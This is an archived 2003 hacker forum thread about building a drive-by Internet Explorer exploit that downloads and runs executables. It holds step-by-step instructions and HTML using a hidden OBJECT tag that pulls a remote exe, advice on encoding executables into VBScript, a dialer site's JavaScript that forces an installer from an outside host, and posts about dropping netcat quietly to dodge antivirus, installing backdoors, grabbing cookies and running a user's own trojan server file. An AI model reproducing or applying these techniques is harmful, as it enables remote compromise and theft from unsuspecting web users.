i have found a german security website there is an example whitch uploadet an file and execution it, its works with ie 5-6 and all current patches from ms i thinks its a lot of exploits in one, but i dont know how does it work but see self.,but you firewall must be off.the browser demo is (harmless) its loaded up a file names ctbrowsercheck to c:\ and execution it and open a windows there you can read a message here the link http://www.heise.de/security/dienste/brows.../htacheck.shtml here is the english translated link but the vulnerabilities does not work with google http://translate.google.com/translate?u=ht...ie=UTF8&oe=UTF8 and here more info translated with google too http://translate.google.com/translate?u=ht...ie=UTF8&oe=UTF8
is that the "Multiple Microsoft Internet Explorer Script Execution Vulnerabilities" ?
regards
matiano
mrBob
Sep 26 2003, 12:35 PM
hmm, sometimes i really don't like Mr. Norton
matiano
Sep 26 2003, 12:54 PM
@mrBob hmm...? this was not the answer of my question. you mean the noton script blocker?
flame
Sep 27 2003, 12:14 AM
wow this actually worked on my system (xp sp2 and Internet Explorer 6.0 updated!@!!)can anyone get the source cuzz i sure cant- anyone ?
matiano
Sep 27 2003, 11:05 AM
you can download the sources with getright browser, but you must vitsited (the site) before downloads the files (the getright browser read the cache). but i have no notion about shtml and php. i can only html und jscript :-(
ykk
Sep 27 2003, 03:24 PM
i dumped the source of a site with similar exploit.
I've said it before, but for those of you who missed it, I got an exploit that runs an exe locally on your machine that will pop open your CD drive here:
Also included is a link from there to the source complete with documentation to get a perl script running that will log the ips that visit it. I could make just two html files that would do this same thing, but that wouldn't log ips.
matiano
Sep 28 2003, 10:28 AM
@yorn I know this webside, which does not work with my patches but my example does work with all patches current ms patches. i have grabs the php scrip (htaalert.php) with getright browser. there is an embedded vbs in it.when you download this file and open it (local) with ieplore then comes a stupid ie activex secure message (if you want...blabla, ok or cancel) we must this turn off with any vulnerable. here the script to download it http://de.geocities.com/matiano_99/htaalert.php.zip
ykk
Sep 28 2003, 02:33 PM
i think there's a difference. in the other website, when i tried to open the jpg file, its unreadable, but for urs its a vbscript.
MOS
Sep 28 2003, 09:54 PM
1 stupid question:
How can I translate an .exe file into something like:
MOS, that's simple convert, your ASCII to HEX and change 00=y and FF=z, that because IE don't know how to translate 00 (space). after that you must have JS script or VBS which change y into 00 and z into FF and write code into file (exploit.exe). BTW. It's old exploit from malware
relax
Sep 28 2003, 10:27 PM
QUOTE (gogu258 @ Sep 28 2003, 10:11 PM)
MOS, that's simple convert, your ASCII to HEX and change 00=y and FF=z, that because IE don't know how to translate 00 (space). after that you must have JS script or VBS which change y into 00 and z into FF and write code into file (exploit.exe). BTW. It's old exploit from malware
ummmm.. how do i convert the ascii to hex?
matiano
Sep 29 2003, 10:08 AM
@relax look at packetstormsecurity.nl here the download link for a nice tool http://packetstormsecurity.nl/trojans/exe2vbs.zip it converts any *.exe to vbs, they must do change with the vbs code in htaalert.php, but i dont know how adjust the <Add level2 Compression> so that it works ? i become a error message --->
"16 bit Ms DOS subsystem C:\INSTAL~1.exe the Ntvdm CCU an invalid instruction discovered. CS:06c0 IP:20e3 OP:63 68 74 20 7a clicking it on "latches", in order to terminate application" shit
...but if it works we must still the active x message switch off
...and this is a piece of code from a dialer's site before get infected by dialer (this use .cab file with inf and dll files too) --->
QUOTE
[[script language="JavaScript"]] [[!-- var VLoadInstalled = 1; var nAttempt = 1;
window.onerror = errorwindow; function errorwindow(sMsg,sUrl,sLine){ VLoadInstalled = 0; return true; } function Reload() { window.location.replace('http://download2.0190-dialer.com/autoload.cfm?src=60-1-1-19.exe&tgt=60-1-1-19.exe&dir=dialers&auto=1&fgc=FFFFFF&bgc=2C62A0&vid=&attempt=1'); return; } function DUnsuccess() { window.location.replace('http://download2.0190-dialer.com/result.cfm?srcUrl=http://download2.0190-dialer.com/dialers/60-1-1-19.exe&fgc=FFFFFF&bgc=2C62A0&status=unsuccess&alt'); } function DSuccess() { window.location.replace('http://download2.0190-dialer.com/result.cfm?srcUrl=http://download2.0190-dialer.com/dialers/60-1-1-19.exe&fgc=FFFFFF&bgc=2C62A0&status=success&alt'); }
function ErrorActiveX() { VLoadInstalled = 0; if(nAttempt < 2) { Reload(); alert('Sie müssen die Installationsroutine mit <JA> bestätigen,\ndamit die Seite korrekt angezeigt werden kann.'); } else { if( confirm('Sie haben die Zugangssoftware nicht installiert.\nUm die Seite korrekt anzuzeigen,\nmüssen Sie diese Software installieren.\n\nWollen Sie die Software jetzt installieren?') ) { nAttempt = 1 ; Reload(); } else { if(nAttempt != 5){ DUnsuccess(); } } } return true; }
if someone know something about this, plz post... THX!
what
Oct 1 2003, 03:25 AM
i'm having a little trouble wih this, and since the link to the sources no longer works, i'm just guessing. Right now I have my own .php embeded file, and it all works locally on my computer, but it doesn't work on the web. I'm wondering if it just doesn't work with the service that I am using, (which is angelfire). Anyways, the file I am using can be found here. What is does is creates NETCAT in the C:\ folder, but it doesn't execute so it won't trigger any AV software. Simply create a HTML document with the following as the source to make it work, locally.
It should work the first time. After you run it once and want to run it again, delete the C:\nc.exe file so it will continue to exploit. Any and all feedback would be great. Remember, download the above .php file and execute the above code in a HTML document, leaving them in the same directory, and this will work. I need to know why this will not work on the web.
matiano
Oct 1 2003, 03:21 PM
@what i know what you mean, that the same problem with the IE "Exploit.SelfExecHtml" vulnerability ...it works only local. and haye you tried it with the orginal php (htaalert.php) on the webserver ?
Yorn
Oct 2 2003, 08:48 PM
Okay, I'm helping the little ones. For those of you who already knew how this worked, don't berate me for explaining it just one more time.
1) First, go check out http://sec.gravito.com/hta/ 2) If your CD-ROM drive didn't open, find a different computer and repeat step 1 3) Take a look at the source on that HTML:
CODE
<HTML> <OBJECT STYLE="display:none" DATA="http://sec.gravito.com/hta/?test.exe"> </OBJECT> <font size="2" face="System"> <P>This is a proof-in-concept of the Object Data Remote Execution vulnerability. It doesn't actually do any damage, but we have tested it and it *does* work.</P> <P>If your CDROM drive just opened up, you are exploitable. Please download the security update by heading to <A HREF="http://windowsupdate.microsoft.com">Windows Update</A>.</P> <P>Or, <A HREF="hta-ver1.zip">download it</A> and figure out what the hell just happened.</P> <P>Note: If your CD-ROM drive didn't open, don't tell me "it didn't work". I created this code for those individuals that know how to use it. If you're stupid enough to think that just because this didn't work on your computer that it "doesn't work" and feel a need to tell me about it, I will personally compromise your machine and "deltree /y c:\windows\"</p> </font></HTML>
4) Note that the only items in that html that matter are between the "<OBJECT>" tags
YOU MUST USE TWO HTML FILES FOR THIS REMOTE EXPLOIT TO WORK. YOU MUST USE TWO HTML FILES FOR THIS REMOTE EXPLOIT TO WORK. YOU MUST USE TWO HTML FILES FOR THIS REMOTE EXPLOIT TO WORK.
Okay, so you don't need two HTML files, but one item simply "HAS" to point in an object reference to another. So you cannot code this in one HTML file.
So you've got your exploit with a VBS script saved as an .html right? Good job, you've got one of the *2* files needed for this exploit. The other .html file has to point to the one you've already made and do almost exactly what I did in the exploit on my security page:
5) Just make a new HTML and put these two lines above in it and change that DATA="<name of your already completed HTML>".
6) Then run the HTML that you made and see if it auto executes the other HTML you have. It should do it if you are on an unpatched machine. If you didn't listen to me and repeat step 1 till you found a machine that was affected, then you don't deserve to figure this exploit out. It's not like you can exploit everyone.
what
Oct 3 2003, 12:32 PM
thanks yorn! i'm sorry for the stupidity earlier. I remember going to the german site and seeing multiple pages loaded in IE, i wasn't quite sure how that worked. Again, thankyou, i've been very curious about this, and at least I learned something from it. Also, I would like to say that this exploit should not be used in the wild, only for informational purposes, and therefore this exploit should not leave the forum, out of respect for the creator and hate for microsoft
relax
Oct 3 2003, 12:40 PM
QUOTE (Yorn @ Oct 2 2003, 08:48 PM)
Okay, I'm helping the little ones. For those of you who already knew how this worked, don't berate me for explaining it just one more time.
1) First, go check out http://sec.gravito.com/hta/ 2) If your CD-ROM drive didn't open, find a different computer and repeat step 1 3) Take a look at the source on that HTML:
CODE
<HTML> <OBJECT STYLE="display:none" DATA="http://sec.gravito.com/hta/?test.exe"> </OBJECT> <font size="2" face="System"> <P>This is a proof-in-concept of the Object Data Remote Execution vulnerability. It doesn't actually do any damage, but we have tested it and it *does* work.</P> <P>If your CDROM drive just opened up, you are exploitable. Please download the security update by heading to <A HREF="http://windowsupdate.microsoft.com">Windows Update</A>.</P> <P>Or, <A HREF="hta-ver1.zip">download it</A> and figure out what the hell just happened.</P> <P>Note: If your CD-ROM drive didn't open, don't tell me "it didn't work". I created this code for those individuals that know how to use it. If you're stupid enough to think that just because this didn't work on your computer that it "doesn't work" and feel a need to tell me about it, I will personally compromise your machine and "deltree /y c:\windows\"</p> </font></HTML>
4) Note that the only items in that html that matter are between the "<OBJECT>" tags
YOU MUST USE TWO HTML FILES FOR THIS REMOTE EXPLOIT TO WORK. YOU MUST USE TWO HTML FILES FOR THIS REMOTE EXPLOIT TO WORK. YOU MUST USE TWO HTML FILES FOR THIS REMOTE EXPLOIT TO WORK.
Okay, so you don't need two HTML files, but one item simply "HAS" to point in an object reference to another. So you cannot code this in one HTML file.
So you've got your exploit with a VBS script saved as an .html right? Good job, you've got one of the *2* files needed for this exploit. The other .html file has to point to the one you've already made and do almost exactly what I did in the exploit on my security page:
5) Just make a new HTML and put these two lines above in it and change that DATA="<name of your already completed HTML>".
6) Then run the HTML that you made and see if it auto executes the other HTML you have. It should do it if you are on an unpatched machine. If you didn't listen to me and repeat step 1 till you found a machine that was affected, then you don't deserve to figure this exploit out. It's not like you can exploit everyone.
yorn, that "test" doesnt work for me the way it is... heres my verson of his test HERE it mite take a while to download lol
and dont go looking around that webspace unless u want to find the other pages that will install trojans and shit
what
Oct 4 2003, 01:15 AM
Alright, I finally got it down straight. I had to download Apache for windows and reconfigure how it handles HTA files. Not that difficult, right? Thank's for the info, and I will soon have a POC code of my own posted on my NEW apache server. Thank's again to everyone that helped me, I learned more with this exploit than I believe with any other. The more knowledge, the more power
Yorn
Oct 4 2003, 01:57 AM
QUOTE (what @ Oct 4 2003, 01:15 AM)
Alright, I finally got it down straight. I had to download Apache for windows and reconfigure how it handles HTA files. Not that difficult, right? Thank's for the info, and I will soon have a POC code of my own posted on my NEW apache server. Thank's again to everyone that helped me, I learned more with this exploit than I believe with any other. The more knowledge, the more power
No problem man.
The way I figure it, if you actually *LEARN* what you are doing then I'm more than happy to share what I know. It actually took me a little while to figure out the part about having object code in another HTML as I had never used <OBJECT> before.
what
Oct 4 2003, 09:01 PM
http://24.98.243.112/univ.html this code copies nc.exe into the C:\ folder, it does not execute it so it won't trigger AV.
what
Oct 4 2003, 09:03 PM
here is the code, sorry, I really messed up that other link.
niko
Oct 8 2003, 07:13 PM
Wow, this worked on ALL of my XP computers, at home, and at work. It would be pretty powerful for cookie grabbing, or of course anything else, like installing a backdoor. Not pretty (well, it is pretty to some )
-niko
pedraM
Oct 8 2003, 07:21 PM
QUOTE (Yorn @ Oct 2 2003, 08:48 PM)
Okay, I'm helping the little ones. For those of you who already knew how this worked, don't berate me for explaining it just one more time.
1) First, go check out http://sec.gravito.com/hta/ 2) If your CD-ROM drive didn't open, find a different computer and repeat step 1 3) Take a look at the source on that HTML:
CODE
<HTML> <OBJECT STYLE="display:none" DATA="http://sec.gravito.com/hta/?test.exe"> </OBJECT> <font size="2" face="System"> <P>This is a proof-in-concept of the Object Data Remote Execution vulnerability. It doesn't actually do any damage, but we have tested it and it *does* work.</P> <P>If your CDROM drive just opened up, you are exploitable. Please download the security update by heading to <A HREF="http://windowsupdate.microsoft.com">Windows Update</A>.</P> <P>Or, <A HREF="hta-ver1.zip">download it</A> and figure out what the hell just happened.</P> <P>Note: If your CD-ROM drive didn't open, don't tell me "it didn't work". I created this code for those individuals that know how to use it. If you're stupid enough to think that just because this didn't work on your computer that it "doesn't work" and feel a need to tell me about it, I will personally compromise your machine and "deltree /y c:\windows\"</p> </font></HTML>
4) Note that the only items in that html that matter are between the "<OBJECT>" tags
YOU MUST USE TWO HTML FILES FOR THIS REMOTE EXPLOIT TO WORK. YOU MUST USE TWO HTML FILES FOR THIS REMOTE EXPLOIT TO WORK. YOU MUST USE TWO HTML FILES FOR THIS REMOTE EXPLOIT TO WORK.
Okay, so you don't need two HTML files, but one item simply "HAS" to point in an object reference to another. So you cannot code this in one HTML file.
So you've got your exploit with a VBS script saved as an .html right? Good job, you've got one of the *2* files needed for this exploit. The other .html file has to point to the one you've already made and do almost exactly what I did in the exploit on my security page:
5) Just make a new HTML and put these two lines above in it and change that DATA="<name of your already completed HTML>".
6) Then run the HTML that you made and see if it auto executes the other HTML you have. It should do it if you are on an unpatched machine. If you didn't listen to me and repeat step 1 till you found a machine that was affected, then you don't deserve to figure this exploit out. It's not like you can exploit everyone.
it works with out ant error but my server file never run and download propely! ( q.exe is not my server file) i think i must edit index.cgi file! but i dont know CGI and PERL language! could any one guid me?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
